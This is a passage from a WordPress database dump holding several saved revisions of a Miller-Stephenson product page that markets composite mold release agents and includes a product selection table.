Non-flammable formulations</li>\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\n 	<li>Higher productivity; Increased cost-effectiveness</li>\n 	<li>Low rejection rate; Consistent part quality</li>\n</ul>\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\n<ul>\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\n 	<li>Thermoset Prepregs</li>\n 	<li>Potting and Casting Resins</li>\n 	<li>Hand lay-ups</li>\n 	<li>Filament Winding</li>\n 	<li>Autoclave molding</li>\n 	<li>Vacuum bag molding</li>\n 	<li>Resin transfer molding</li>\n 	<li>Resin film infusion</li>\n 	<li>Compression, Transfer, Injection Molding</li>\n 	<li>Rotational Molding</li>\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\n</ul>\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\n<ul>\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\n 	<li>Cost-effective, high durability, and consistent mold release</li>\n 	<li>Reduced downtime and scrap rates</li>\n 	<li>Minimal mold fouling and transfer</li>\n</ul>\n<h2><strong>Release Agent Selection Guide:</strong></h2>\n<table width="751">\n<tbody>\n<tr>\n<td style="text-align: center;" width="122">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="122">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="153">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="151">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="203">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\n</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\n<td style="text-align: center;" rowspan="3">Matte</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\n<td style="text-align: center;">Medium  Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">No transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Instant Cure</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\n<td style="text-align: center;">PTFE Dry Film</td>\n</tr>\n<tr>\n<td style="text-align: center;">No transfer</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal Rejection Rate</td>\n</tr>\n<tr>\n<td style="text-align: center;">High Durability</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3">High Slip</td>\n<td style="text-align: center;" rowspan="3">Matte</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\n<td style="text-align: center;">Instant Cure</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer</td>\n</tr>\n<tr>\n<td style="text-align: center;">High Durability; High Slip</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n</tbody>\n</table>\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\n\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-autosave-v1', '', '', '2016-11-09 14:11:20', '2016-11-09 14:11:20', '', 2936, 'https://www.miller-stephenson.com/2936-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2958, 2, '2016-11-09 14:06:05', '2016-11-09 14:06:05', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-09 14:06:05', '2016-11-09 14:06:05', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2959, 2, '2016-11-09 14:09:18', '2016-11-09 14:09:18', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-09 14:09:18', '2016-11-09 14:09:18', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2960, 2, '2016-11-09 14:11:36', '2016-11-09 14:11:36', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a 